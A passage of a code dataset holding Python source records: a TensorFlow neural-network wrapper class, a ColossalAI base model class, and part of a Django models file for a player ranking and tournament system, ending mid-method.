print_function\n\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom DataPrep import random_batch_generator, fast_random_batch_generator\n\n# from plotroutines import draw_triangle_cont\ndef selu(x, name):\n alpha = 1.6732632423543772848170429916717\n scale = 1.0507009873554804934193349852946\n return tf.multiply(scale,tf.where(x>=0.0, x, alpha*tf.nn.elu(x)), name=name)\n \ndef get_optimizer(optimizer):\n if optimizer == \"Adam\":\n return tf.train.AdamOptimizer\n elif optimizer == \"Adagrad\":\n return tf.train.AdagradOptimizer\n elif optimizer == \"Adadelta\":\n return tf.train.AdadeltaOptimizer\n elif optimizer == \"Momentum\":\n return tf.train.MomentumOptimizer\n elif optimizer == \"GradientDescent\":\n return tf.train.GradientDescentOptimizer\n else:\n raise ValueError(\"'{0}' not a valid optimizer\".format(optimizer))\n\nclass NeuralNet(object):\n\n\n @staticmethod\n def _get_layers(h, l, n):\n \"\"\"\n Determine the dimensions of all layers n with given input size h and output size l\n including the visible in- and output layers\n 0 layers return just one hidden layer which maps from input to ouput\n 1 layer has one intermediate layer of size inbetween in- and output ...\n \"\"\"\n return [h - int((i)*(h-l)*1./(n+1)) for i in range(n+2)]\n\n @staticmethod\n def _get_activation(activation=None):\n if activation == \"sigmoid\":\n return tf.nn.sigmoid\n elif activation == \"relu\":\n return tf.nn.relu\n elif activation == \"softsign\":\n return tf.nn.softsign\n elif activation == \"tanh\":\n return tf.nn.tanh\n elif activation == \"linear\" or activation == \"lin\" or activation is None:\n return tf.identity\n elif activation == \"elu\":\n return tf.nn.elu\n elif activation == \"selu\":\n return selu\n elif activation == \"lrelu\":\n return tf.nn.leaky_relu\n elif activation == \"softmax\":\n return tf.nn.softmax\n else:\n print(\"Error: Unknown activation '%s'\" % activationN)\n exit(-1)\n \n loss_log = []\n save = False\n nLayer = None\n\n def _get_number(self, last=False):\n nn = 1\n while os.path.isdir(\"tmp/summary_\"+self.flag_name+(\"_%d\" % nn)):\n nn += 1\n if last:\n return nn - 1\n else:\n return nn\n \n def _fully_connected_stack(self, x, vname, layers, activation_fn,\n factor_weights, mode_weights, uniform_weights, factor_bias, mode_bias, uniform_bias,\n aname=\"act\", norm=\"None\"):\n \"\"\"\n Args:\n x: tensor, input\n vname: string, namespace for the variables, variables are named: \"name_w3\" or \"name_b1\" starting with 0\n layers: array, not including input size\n activation_fn: list of tensorflow functions. Is applied to each layer, excluding the input, including output\n factor, mode, uniform: float, 'FAN_AVG'/'FAN_IN'/'FAN_OUT', see tf doc., bool (default xavier_initialization)\n aname: string, namespace for the activation functions, names will be: \"act_0\", \"act_1\", ...\n norm: \"None\", \"Layer\"\n Returns:\n a: tensor, the activation of the last layer\n \"\"\"\n x_shape = x.shape[1]\n i = 0\n a = x\n \n for i, layer in enumerate(layers):\n\n l_ = x_shape if i == 0 else layers[i-1] # previous size, shape for the weights\n\n w = tf.get_variable(\"%s_w%d\"%(vname,i), shape=[l_, layer], initializer=tf.contrib.layers.variance_scaling_initializer(factor=factor_weights, mode=mode_weights, uniform=uniform_weights))\n b = tf.get_variable(\"%s_b%d\"%(vname,i), shape=[layer], initializer=tf.contrib.layers.variance_scaling_initializer(factor=factor_bias, mode=mode_bias, uniform=uniform_bias))\n \n if activation_fn[i] is not None:\n a = tf.matmul(a, w)\n \n if norm == \"Layer\":\n a = tf.contrib.layers.layer_norm(a)\n\n a = tf.add(a, b)\n a = activation_fn[i](a, name=\"%s_a%d\"%(aname,i))\n else:\n a = tf.add(tf.matmul(a, w), b, name=\"%s_a%d\"%(aname,i))\n if self.tensorboard:\n tf.summary.histogram(\"hist_activation_%d\"%i, a)\n # opname = \"%s_a%d\"%(aname,i)\n # if not opname in [op.name for op in tf.get_default_graph().get_operations()]:\n # print(\"Did not find {0} in OperationCollection, adding manually ...\".format(opname))\n # tf.get_default_graph()._add_op(a)\n \n return a\n \n def __del__(self):\n try:\n if self.save:\n save_path = self.saver.save(self.sess, self.save_path)\n print(\"Saved neural net in: %s\" % save_path)\n tf.reset_default_graph()\n except Exception:\n pass\n \n def __init__(self, import_dir=None, nInput=None, nOutput=None, nOutput_binary=0, layers=None,\n estimate_uncertainty=False, norm=\"None\",\n uniform_bias=False, uniform_weights=False, factor_weights=1, factor_bias=1, mode_weights='FAN_AVG', mode_bias='FAN_AVG',\n optimizer=\"Adam\", learning_rate=.1, momentum=.1,\n activations=\"tanh\", lastLayer=\"linear\", objective=None, convert_to_onehot=False,\n load=False, number=None, dtype=\"float\", tensorboard=True):\n \"\"\"\n Args:\n nInput: int, number of input dimension of the data\n nOutput: int, number of output dimension of the data\n nOutput_binary: int, number of trailing (!) output dimensions that are binary. Should not exceed nOutput.\n layers: array, excluding input and output neurons, i.e. [6] a network with nInput input neurons, one\n hidden layer with 6 neurons, one output layer 6->nOutput\n norm: additional normalization; \"None\", \"Layer\"\n uniform_bias/weights: bool, initialization of bias and weights\n optimizer: string, \"GradientDescent\", \"Adam\", \"Adagrad\", \"Adadelta\", \"Momentum\"\n learning_rate, momentum: float\n activations: string, activation function f(w*x+b) to be used: \"relu\", \"selu\", \"sigmoid\", \"tanh\", \"softsign\", \"linear\"\n lastLayer: string, activations for the last layer, specify like activations or \"softmax\"\n objective: string, the objective which is to be minimized, specify from: \"L2\", \"CrossEntropy\", default:\n CrossEntropy for lastLayer=\"softmax\"\n L2 otherwise\n convert_to_onehot: bool, if True, convert the target input to one_hot vector. Input has shape [batch_size,]\n now (default=False). The depth (number of labels to use for one_hot encoding) is given by nDim_low,\n or layers[-1]\n load: bool\n number: int, number of the network, if None is given, it is automatically assigned\n \"\"\"\n \n if import_dir is not None:\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n \n self.sess = tf.Session(config=config)\n self.sess.as_default()\n tf.saved_model.loader.load(self.sess, [\"main\"], import_dir)\n \n try:\n self.layers = self.sess.run(\"layers:0\")\n self.nLayer = self.sess.run(\"nLayer:0\")\n except ValueError:\n print(\"Warning: Using deprecated model with new NN version. Model might not be able to use 'layers' variable\")\n \n \n self.init = tf.global_variables_initializer()\n else:\n if dtype==\"float\":\n dtype = tf.float32\n else:\n dtype = tf.float64\n \n if not os.path.isdir(\"out\"):\n os.makedirs(\"out\")\n # if not os.path.isdir(\"out/vid\"):\n # os.makedirs(\"out/vid\")\n if tensorboard and not os.path.isdir(\"tmp\"):\n os.makedirs(\"tmp\")\n\n self.tensorboard = tensorboard\n\n if layers is None:\n layers = []\n else:\n layers = list(layers)\n self.layers = layers\n allLayers = [nInput] + self.layers + [nOutput]\n self.nLayer = len(layers)\n \n tf.constant(self.layers, dtype=tf.int32, name=\"layers\")\n tf.constant(self.nLayer, name=\"nLayer\")\n self.flag_name = (\"NN\" + \"_%d\"*len(allLayers)) % tuple(allLayers)\n self.save_path = \"out/\"+self.flag_name+\".ckpt\"\n print(\"Neural Net network layers (inclusive in/- and output): \", end=\"\")\n print(allLayers, end=\"; No. of parameters: \")\n print(np.sum(np.array(allLayers[:-1])*np.array(allLayers[1:])))\n\n # last layer activation and objective function\n if lastLayer == \"softmax\" and (objective is None or objective == \"CrossEntropy\"):\n self.objective = \"softmax_cross_entropy_with_logits\"\n self.lastLayer = \"softmax\"\n elif lastLayer == \"sigmoid\" and objective == \"CrossEntropy\":\n self.objective = \"sigmoid_cross_entropy_with_logits\"\n self.lastLayer = \"sigmoid\"\n elif objective is None or objective == \"L2\":\n self.objective = \"L2\"\n self.lastLayer = lastLayer\n elif objective == \"CrossEntropy\":\n raise ValueError(\"Using Cross Entropy loss function without a softmax/sigmoid layer (Not implemented, Sorry, but you are weird).\")\n else:\n raise ValueError(\"Trying to build the network, but objective or last layer activation function is invalid (%s, %s)\" % (objective, lastLayer) )\n\n # neural net: input\n x = tf.placeholder(dtype, shape=[None,nInput], name='x')\n if not convert_to_onehot:\n y = tf.placeholder(dtype, shape=[None,nOutput], name='y')\n yy = y\n else:\n y = tf.placeholder(tf.int32, shape=[None], name='y')\n yy = tf.one_hot(y, nOutput, name=\"yy\")\n yy_real = yy[:,:nOutput - nOutput_binary]\n yy_bina = yy[:,nOutput - nOutput_binary:]\n \n # neural net\n thelayers = layers + [2*nOutput - nOutput_binary] if estimate_uncertainty else layers + [nOutput]\n theactivations = [self._get_activation(activations) for _ in self.layers] + [tf.identity]\n logits_all = self._fully_connected_stack(x, \"nn\", thelayers, theactivations,\n factor_weights, mode_weights, uniform_weights, factor_bias, mode_bias, uniform_bias, norm=norm)\n \n # sigma for the reals\n if estimate_uncertainty:\n epsilon = -10 # regularizes sigma to a minimum of log\\sigma > espilon\n y_sigmaLogits = epsilon + tf.nn.relu(logits_all[:,nOutput:] - epsilon)\n y_sigma = tf.exp(y_sigmaLogits, name=\"sigma\")\n \n logits = logits_all[:,:nOutput]\n else:\n logits = logits_all\n \n last_activation = self._get_activation(self.lastLayer)\n # real and binary part\n logits_real = logits[:,:nOutput - nOutput_binary]\n logits_bina = logits[:,nOutput - nOutput_binary:]\n # activations\n y_real = last_activation(logits_real)\n y_bina = tf.nn.sigmoid(logits_bina)\n y_hat = tf.concat([y_real, y_bina], axis=1, name=\"y_hat\")\n\n # error functions and loss\n if self.objective == \"softmax_cross_entropy_with_logits\":\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=yy, logits=logits), name='loss')\n elif self.objective == \"sigmoid_cross_entropy_with_logits\":\n loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=yy, logits=logits), name='loss')\n else:\n # without sigma\n error_single_sample = tf.concat([0.5*tf.square(yy_real - y_real),\n tf.nn.sigmoid_cross_entropy_with_logits(logits=y_bina, labels=yy_bina)], axis=1, name=\"error_single_sample\")\n error_sample = tf.reduce_sum(error_single_sample, axis=1, name=\"error_sample\")\n error = tf.reduce_mean(error_sample, name=\"error\")\n # with sigma\n if estimate_uncertainty:\n likelihood_sample = tf.add(tf.reduce_sum(0.5*tf.square(tf.divide(\n y_real - yy_real, y_sigma)) + y_sigmaLogits, axis=1),\n tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=y_bina, labels=yy_bina), axis=1), name=\"likelihood_sample\")\n likelihood = tf.reduce_mean(likelihood_sample, name=\"likelihood\")\n else:\n likelihood_sample = tf.identity(error_sample, name=\"likelihood_sample\")\n likelihood = tf.identity(error, name=\"likelihood\")\n \n loss = tf.identity(likelihood, name=\"loss\")\n\n # optimizer\n optimizer_fun = get_optimizer(optimizer)\n optimizer = optimizer_fun(learning_rate)\n\n # train step\n d_train = optimizer.minimize(loss, name=\"dtrain\")\n\n # Session and initialization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n\n self.sess = tf.Session(config=config)\n self.sess.as_default()\n self.init = tf.global_variables_initializer()\n\n \n # Tensorboard\n if tensorboard:\n for p in range(len(layers)+1):\n # Variable summaries\n # tf.summary.histogram(\"nn_w%d\" % p, \"nn_w%d\" % p)\n # tf.summary.histogram(\"nn_n%d\" % p, \"nn_w%n\" % p)\n\n # Activation summaries\n # below doesnt always work for some reason, added op when creating the activation op instead\n # tf.summary.histogram(\"hist_activation_%d\"%p, self.sess.graph.get_tensor_by_name(\"act_a%d:0\"%p))\n pass\n\n # self.loss_feed_valid = tf.placeholder(tf.float32, [None], name=\"loss_feed_valid\")\n loss_feed_train = tf.placeholder(dtype, [None], name=\"loss_feed_train\")\n # tf.summary.scalar(\"loss_valid\", tf.reduce_mean(self.loss_feed_valid))\n tf.summary.scalar(\"loss_train\", tf.reduce_mean(loss_feed_train))\n tf.summary.scalar(\"loss_valid\", loss)\n if estimate_uncertainty:\n tf.summary.scalar(\"l2_error\", error)\n\n merged = tf.summary.merge_all()\n if number is None and load:\n self.number = self._get_number(last=False)\n elif number is None:\n self.number = self._get_number()\n twriter_path = os.path.join(os.getcwd(), \"tmp\", \"summary_\" + self.flag_name + (\"_%d\" % self.number))\n self.test_writer = tf.summary.FileWriter(twriter_path, self.sess.graph)\n print(\"To use tensorboard, type:\")\n print(\"tensorboard --logdir='\" + twriter_path + \"'\")\n\n # Save and Load\n self.saver = tf.train.Saver()\n if load:\n self.saver.restore(self.sess, self.save_path)\n else:\n self.sess.run(self.init)\n\n def _validate(self, test_data, i, print_console=True, train_loss=0.):\n\n if not test_data is None:\n x_, y_ = test_data\n \n summary, error, loss = self.sess.run([\"Merge/MergeSummary:0\", \"error:0\", \"loss:0\"], feed_dict={\"x:0\": x_, \"y:0\": y_, \"loss_feed_train:0\": [train_loss]})\n\n self.test_writer.add_summary(summary, i)\n self.loss_log.append([i, loss])\n\n if print_console:\n print(\"%d: error=%.4g; loss=%.4g; Train=%.4g\" % (i, error, loss, train_loss))\n else:\n summary = self.sess.run(\"loss_train:0\", feed_dict={\"loss_feed_train:0\": [train_loss]})\n self.test_writer.add_summary(summary, i)\n self.loss_log.append([i, train_loss])\n if print_console:\n print(\"%d: Train=%.5g\" % (i, train_loss))\n\n def train(self, nTrain, batch_gen, test_data=None, save=False, test_step=500, print_step=500, count_tests=False):\n \"\"\"\n param:\n nTrain: int, number of train steps\n batch_gen: generator object which yields: x and y for the network [x,y]\n test_data: array of test data [x,y]\n save: bool (default=False)\n test_step: int, test every test_step steps (default=500)\n print_step: int, print every print_step steps if data has been tested\n count_tests: bool, For printing and tensorboard. The step given is either the test number (True) or train_step number (False)\n :return int, number of training steps\n \"\"\"\n\n self.save = save\n t0 = time.time()\n self.loss_log = list(self.loss_log)\n\n if self.objective == \"softmax_cross_entropy_with_logits\":\n print(\"Minimizing cross entropy. Purely random, fair, expected CE: %.4g\"%np.log(self.nDim_out))\n elif self.objective == \"sigmoid_cross_entropy_with_logits\":\n print(\"Minimizing cross entropy. Purely random, fair, expected CE: %.4g\"%np.log(2))\n\n step = 0\n while step < nTrain:\n\n x_, y_ = next(batch_gen)\n tloss, _ = self.sess.run([\"loss:0\", \"dtrain\"], feed_dict={\"x:0\": x_, \"y:0\": y_})\n \n if step % test_step == 0:\n tx = step/test_step if count_tests else step\n self._validate(test_data, tx, (step % print_step == 0), train_loss=tloss)\n step += 1\n\n self.loss_log = np.array(self.loss_log)\n\n if save:\n save_path = self.saver.save(self.sess, self.save_path)\n\n print(\"Training time: %.3f\" % (time.time() - t0))\n return step\n \n def fit(self, X, y=None, *args, **kwargs):\n test_data = kwargs.pop(\"test_data\", None)\n batch_size = kwargs.pop(\"batch_size\", 128)\n nTrain = kwargs.pop(\"nTrain\", 10000)\n future = kwargs.pop(\"future\", 0)\n \n y = X if y is None else y\n nInput = self.sess.graph.get_tensor_by_name(\"x:0\").shape[1]._value\n nOutput = self.sess.graph.get_tensor_by_name(\"y:0\").shape[1]._value\n \n look_back = nInput//X.shape[1]\n sum_back = nOutput//y.shape[1]\n\n if look_back == sum_back == future + 1 == 1:\n batch_gen_train = fast_random_batch_generator(X, y, batch_size)\n else:\n batch_gen_train = random_batch_generator(X, y, batch_size, look_back, sum_back, future, 1, 1, 1)\n if test_data is not None:\n batch_gen_test = random_batch_generator(test_data[0], test_data[1], -1, look_back, sum_back, future, shuffle=0)\n test_data = next(batch_gen_test)\n \n self.train(nTrain, batch_gen_train, test_data, *args, **kwargs)\n return self\n\n def _batch_process_x(self, tensor, x, batch_size=-1, y=None):\n if (batch_size is None) or (batch_size < 0) or (batch_size > len(x)):\n batch_size = len(x)\n if isinstance(tensor, list):\n N = len(tensor)\n else:\n N = 0\n\n if N == 0:\n result = []\n else:\n result = [[] for _ in range(N)]\n i = 0\n while True:\n high = i + batch_size if i + batch_size < len(x) else len(x)\n feed_dict={\"x:0\": x[i:high]} if (y is None) else {\"x:0\": x[i:high], \"y:0\": y}\n tmp = self.sess.run(tensor, feed_dict)\n if N == 0:\n result.append(tmp)\n else:\n for t in range(N):\n result[t].append(tmp[t])\n\n i += batch_size\n if high == len(x):\n break\n if N == 0:\n return np.concatenate(result, axis=0)\n else:\n return [np.concatenate(result_, axis=0) for result_ in result]\n\n def process_data(self, data, batch_size=None):\n \"\"\"\n Returns:\n Troughput of the network, shape=[N,nDim_out]\n \"\"\"\n return self._batch_process_x(\"y_hat:0\", data, batch_size)\n \n def process_data_loss(self, data, targets):\n \"\"\"\n Returns:\n Throughput of the network, shape=[N,nDim_out]\n loss function, shape=[]\n \"\"\"\n return self.sess.run([\"y_hat:0\", \"loss:0\"], feed_dict={\"x:0\": data, \"y:0\": targets})\n\n def reduce_process_data(self, layer_x, data, batch_size=None):\n \"\"\"\n Args:\n layer_x: layer number of which the activations are processed\n Returns:\n layer_x activations, shape=[N,layers[x+1]]\n Troughput of the network, shape=[N,nDim_out]\n \"\"\"\n return self._batch_process_x([\"act_a%d:0\"%layer_x, \"y_hat:0\"], data, batch_size)\n \n def process(self, tensors, datax, datay=None):\n \"\"\"\n Process different kind of tensors by name, possibilities given below\n :param tensors: str or list from: [\"y\", \"sigma\", \"error\", \"error_single\", \"likelihood\", \"loss\"]\n :param datax:\n :param datay:\n :return:\n \"\"\"\n if type(tensors) is str:\n tensors_ = [tensors]\n else:\n tensors_ = tensors\n \n if len(datax.shape) == 1:\n data = np.reshape(data, [1,-1])\n elif len(datax.shape) > 2:\n raise ValueError(\"Invalid shape of data input, found: %s\"%str(data.shape))\n \n tensorNames = {\n \"y\": \"y_hat:0\",\n \"sigma\": \"sigma:0\",\n \"error\": \"error_sample:0\",\n \"error_single\": \"error_single_sample:0\",\n \"likelihood\": \"likelihood_sample:0\",\n \"loss\": \"loss:0\",\n }\n \n tensors_ = [tensorNames[tensors__] for tensors__ in tensors_]\n if datay is None:\n feed_dict = {\"x:0\": datax}\n else:\n feed_dict = {\"x:0\": datax, \"y:0\": datay}\n result = self.sess.run(tensors_, feed_dict=feed_dict)\n \n if type(tensors) is str:\n return result[0]\n else:\n return result\n\n def predict(self, X, estimate_uncertainty=False):\n \"\"\"\n Predict with the neural net. If n_feature != nInput, look_back is inferred.\n :param X: numpy array, shape is [n_sample, n_feature]\n :return y: numpy array, output predictions\n \"\"\"\n nInput = self.sess.graph.get_tensor_by_name(\"x:0\").shape[1]._value\n look_back = nInput//X.shape[1]\n\n if not (look_back == 1):\n batch_gen = random_batch_generator(X, None, -1, look_back, 0, 0, shuffle=0)\n datax, _ = next(batch_gen)\n else:\n datax = X\n \n tensors = ['y', 'sigma'] if estimate_uncertainty else 'y'\n ret = self.process(tensors, datax)\n return ret\n \n # def dream_input(self, output):\n # # output = tf.constant(output)\n # dream_input = tf.get_variable(\"dream_input\", shape=[self.nDim_in], dtype=tf.float32, initializer=tf.contrib.layers.zeros_initializer)\n # dream_output = tf.placeholder(tf.float32, shape=[self.nDim_out])\n\n # with tf.variable_scope(\"trainable\") as scope:\n # scope.reuse_variables()\n\n # if len(self.nLayers) > 2:\n # a = self._fully_connected_stack(dream_input, \"nn\", self.nLayers[1:-1], self._get_activation(self.activationN))\n # else:\n # a = dream_input\n\n # # Add a last layer\n # w = tf.get_variable('nn_w%d' % (len(self.nLayers) - 2))\n # b = tf.get_variable('nn_b%d' % (len(self.nLayers) - 2))\n\n # # logits and activations\n # logits = tf.add(tf.matmul(a, w), b)\n # loss = tf.reduce_mean(tf.square(dream_output - self.activations))\n\n def save_loss_log(self, plot=True):\n # return 0\n np.save(\"out/losses_\"+self.flag_name + (\"_%d\" % self.number) + \".npy\", self.loss_log)\n\n if plot:\n # LOGPLOTS\n plt.close(\"all\")\n #plt.plot(self.loss_log[:][0], self.loss_log[:][1], color=\"red\")\n plt.semilogy(self.loss_log[:,0], self.loss_log[:,1], color=\"red\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,1]),1.5*np.mean(self.loss_log[:,1])])\n plt.xlabel(\"step\")\n plt.ylabel(\"l2_loss\")\n plt.savefig(\"out/l2_loss_log_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n if False:\n plt.close(\"all\")\n plt.semilogy(self.loss_log[:,0], self.loss_log[:,2], color=\"blue\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,2]),1.5*np.mean(self.loss_log[:,2])])\n plt.xlabel(\"step\")\n plt.ylabel(\"cross_entropy\")\n plt.savefig(\"out/cross_entropy_log_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n # NORMAL PLOTS\n plt.close(\"all\")\n plt.plot(self.loss_log[:,0], self.loss_log[:,1], color=\"red\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,1]),1.5*np.mean(self.loss_log[:,1])])\n plt.xlabel(\"step\")\n plt.ylabel(\"l2_loss\")\n plt.savefig(\"out/l2_loss_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n if False:\n plt.close(\"all\")\n plt.plot(self.loss_log[:,0], self.loss_log[:,2], color=\"blue\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,2]),1.5*np.mean(self.loss_log[:,2])])\n plt.xlabel(\"step\")\n plt.ylabel(\"cross_entropy\")\n plt.savefig(\"out/cross_entropy_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n \n def save_model(self, export_dir):\n \"\"\"\n Use method to save the complete model, which is graph and variables. If you want to load, initialize with the\n export_dir as the import_dir and nothing else.\n Alternatively you can load from a checkpoint set after training, by setting load=True in the initialization.\n The Checkpoint only saves the variables though, so the graph will need to be rebuilt.\n \"\"\"\n builder = tf.saved_model.builder.SavedModelBuilder(export_dir)\n builder.add_meta_graph_and_variables(self.sess, [\"main\"])\n builder.save()\n return export_dir\n","sub_path":"NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":27070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"135322040","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom abc import ABC, abstractmethod\n\nimport torch.nn as nn\n\nfrom colossalai.builder import build_layer\n\n\nclass BaseModel(nn.Module, ABC):\n\n def __init__(self):\n super(BaseModel, self).__init__()\n self.layers = nn.ModuleList()\n self.layers_cfg = []\n\n def build_from_cfg(self, start=None, end=None):\n assert hasattr(self, 'layers_cfg'), 'Cannot find attribute layers_cfg from the module, please check the ' \\\n 'spelling and if you have initialized this variable'\n if start is None:\n start = 0\n if end is None:\n end = len(self.layers_cfg)\n for cfg in self.layers_cfg[start: end]:\n layer = build_layer(cfg)\n self.layers.append(layer)\n\n @abstractmethod\n def init_weights(self):\n pass\n\n def state_dict_for_save_checkpoint(self, destination=None, prefix='',\n keep_vars=False):\n\n \"\"\"Use this function to override the state dict for\n saving checkpoints.\"\"\"\n return self.state_dict(destination, prefix, keep_vars)\n","sub_path":"colossalai/nn/model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"75396304","text":"from datetimewidget.widgets import DateTimeWidget\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.forms import ModelForm\nfrom django.forms.models import inlineformset_factory\nfrom django.utils.translation import ugettext_lazy as _\nfrom index import fields\n\nclass PlayerManager(models.Manager):\n def active_players(self):\n return Player.objects.all().filter(active=True)\n\n# Describes a player. This is separate from the authentication\n# system\nclass Player(models.Model):\n # displayed name\n name = models.CharField(max_length=100)\n # color used for the worm in the game\n color = fields.ColorField()\n # real name, optional\n real_name = models.CharField(max_length=100, blank=True)\n # current ranking points\n ranking_points = models.IntegerField(default=1000)\n # current pool points\n pool_points = models.IntegerField(default=0)\n # if the player is not active, it is not visible in the ranking table etc\n active = models.BooleanField(default=True)\n # a written comment for this player\n comment = models.CharField(blank=True, max_length=100000)\n\n objects = PlayerManager()\n\n # calculates the ante according to the given formula for a certain\n # ante percentage and a pool point unlock\n # returns a dictionary consisting of the ante, the new rp (without removing\n # the ante) and the new pp\n def calculate_ante_percentage(self, percentage, pool_points):\n rp = self.ranking_points\n pp = self.pool_points\n if (pp != 0):\n rp = self.ranking_points + min(self.pool_points, pool_points)\n pp = pp - min(pp, pool_points)\n player_ante = round((rp ** 2) * 0.001 * (percentage * 0.01))\n if player_ante == 0 and rp != 0:\n player_ante = 1\n tmp = {}\n tmp[\"ante\"] = int(player_ante)\n tmp[\"rp\"] = rp\n tmp[\"pp\"] = pp\n return tmp\n\n # calculates the ante for a ranked match for this player\n # returns a dictionary consisting of the ante, the new rp (without removing\n # the ante) and the new pp\n def calculate_ranked_ante(self):\n return self.calculate_ante_percentage(2, 40)\n\n # returns all games that the Player p participated in\n def all_games(self):\n return PlayedGame.objects.all().filter(Q(player_left = self) |\n Q(player_right = self))\n\n # returns all games with this player that earned or lost them ranking points,\n # in other words: ranked and tournament games, but not unranked games\n def ranked_and_tournament_games(self):\n return self.all_games().exclude(Q(ranked=False) &\n Q(tournament=None))\n\n def __unicode__(self):\n return u'%s' % (self.name)\n\n def clean(self):\n pass\n\n class Meta:\n ordering = ['name']\n pass\n\n# Describes a tournament. When initially created, it takes the ante from and\n# adds pool points to all players. When it is recorded as finished, \"finished\"\n# is set to True and it hands out the ante to the winners.\nclass Tournament(models.Model):\n # when True, this tournament has ended and points from it have been recorded\n finished = models.BooleanField(default=False)\n # time and date when the tournament started\n start_time = models.DateTimeField()\n # name of the tournament. May be left blank\n name = models.CharField(max_length=100, blank=True)\n # players participating in this tournament\n players = models.ManyToManyField(Player, related_name=\"tournament_players\")\n # ante from each player, in percent\n ante = models.IntegerField()\n # the number of points to take from the point pool for each player\n pool_points = models.IntegerField(default=0)\n # the calculated total ante\n total_ante = models.IntegerField()\n # a written comment for this tournament\n comment = models.CharField(blank=True, max_length=100000)\n\n # distributes points to all players in this tournament. It is an error to call this\n # without finished being set to true\n def distribute_points(self):\n # not allowed to distribute points for unfinished tournaments\n if not self.finished:\n raise ValueError\n tpas = self.tournament_placing_antes()\n for tpa in tpas:\n tpa.player.ranking_points = tpa.player.ranking_points + tpa.ante\n tpa.player.save()\n points_changed = PointsChanged.objects.all().filter(tournament=self,\n player=tpa.player)[0]\n points_changed.rp_after = tpa.player.ranking_points\n points_changed.save()\n\n def games(self):\n return PlayedGame.objects.all().filter(tournament=self)\n\n def winner(self):\n try:\n return TournamentPlacingAnte.objects.all().filter(tournament=self).filter(placing=1)[0].player\n except:\n return None\n\n def tournament_placing_antes(self):\n return TournamentPlacingAnte.objects.all().filter(tournament=self)\n\n def __unicode__(self):\n return u'%s_%s_%s_%s_%s_%s' % (self.name, self.finished, self.start_time,\n self.ante, self.pool_points, self.total_ante)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\n# used for creating a new tournament\nclass TournamentCreateForm(ModelForm):\n class Meta:\n model = Tournament\n fields = (\n 'start_time',\n 'name',\n 'players',\n 'ante',\n 'pool_points',\n )\n labels = {\n 'start_time' : _('Start time'),\n 'name' : _('Name'),\n 'players' : _('Players'),\n 'ante' : _('Ante (in %)'),\n 'pool_points' : _('Pool points unlocked'),\n }\n widgets = {\n 'start_time' : DateTimeWidget(usel10n=True,\n bootstrap_version=3,\n options={'format' : 'yyyy-mm-dd hh:ii',\n 'weekStart' : '1'})\n }\n def __init__(self, *args, **kwargs):\n super(ModelForm, self).__init__(*args, **kwargs)\n self.fields['players'].queryset = Player.objects.active_players()\n\n# used for editing a tournament\nclass TournamentEditForm(ModelForm):\n class Meta:\n model = Tournament\n fields = (\n 'name',\n 'total_ante',\n 'finished',\n )\n labels = {\n 'name' : _('Name'),\n 'total_ante' : _('Total ante'),\n 'finished' : _('Finished'),\n }\n\n# this is the number of points given to each placing in a tournament\nclass TournamentPlacingAnte(models.Model):\n # the tournament this ante belongs to\n tournament = models.ForeignKey(Tournament)\n # the placing it should be given to\n placing = models.IntegerField()\n # the ante this placing receives\n ante = models.IntegerField()\n # the player that got this placing\n player = models.ForeignKey(Player, null=True, blank=True)\n\n def __unicode__(self):\n return u'%s %s %s %s' % (self.tournament, self.placing, self.ante, self.player)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass TournamentPlacingAnteForm(ModelForm):\n class Meta:\n model = TournamentPlacingAnte\n fields = (\n 'placing',\n 'ante',\n )\n labels = {\n 'placing' : _('Placing'),\n 'ante' : _('Received ante'),\n }\n\nTournamentPlacingAnteFormSet = inlineformset_factory(Tournament, TournamentPlacingAnte,\n extra=1, can_delete=False,\n form=TournamentPlacingAnteForm)\n\nclass TournamentPlacingAnteSubmitForm(ModelForm):\n class Meta:\n model = TournamentPlacingAnte\n fields = (\n 'placing',\n 'ante',\n 'player'\n )\n labels = {\n 'placing' : _('Placing'),\n 'ante' : _('Received ante'),\n 'player' : _('Player'),\n }\n def __init__(self, *args, **kwargs):\n available_players = kwargs.pop('available_players', None)\n super(ModelForm, self).__init__(*args, **kwargs)\n\n if available_players:\n self.fields['player'].queryset = available_players\n\nTournamentPlacingAnteSubmitFormSet = inlineformset_factory(Tournament, TournamentPlacingAnte,\n extra=0, can_delete=False,\n form=TournamentPlacingAnteSubmitForm)\n\nclass PlayedGameManager(models.Manager):\n # the last game that was played\n def last_game(self):\n return PlayedGame.objects.all().order_by('start_time').reverse().first()\n\n# records a played game\nclass PlayedGame(models.Model):\n # the tournament this played game belongs to, if any\n tournament = models.ForeignKey(Tournament, null=True)\n # keeps track of whether this is a ranked game or not.\n # when tournament is not None, this should be False\n ranked = models.BooleanField(default=True)\n # the start time of the game\n start_time = models.DateTimeField()\n # the left player\n player_left = models.ForeignKey(Player, related_name=\"playedgame_player_left\")\n # the right player\n player_right = models.ForeignKey(Player, related_name=\"playedgame_player_right\")\n # winner of this game\n winner = models.ForeignKey(Player, related_name=\"winner\", blank=True, null=True)\n # a written comment for this game\n comment = models.CharField(blank=True, max_length=100000)\n\n objects = PlayedGameManager()\n\n # returns all subgames played as a part of this game\n def subgames(self):\n return 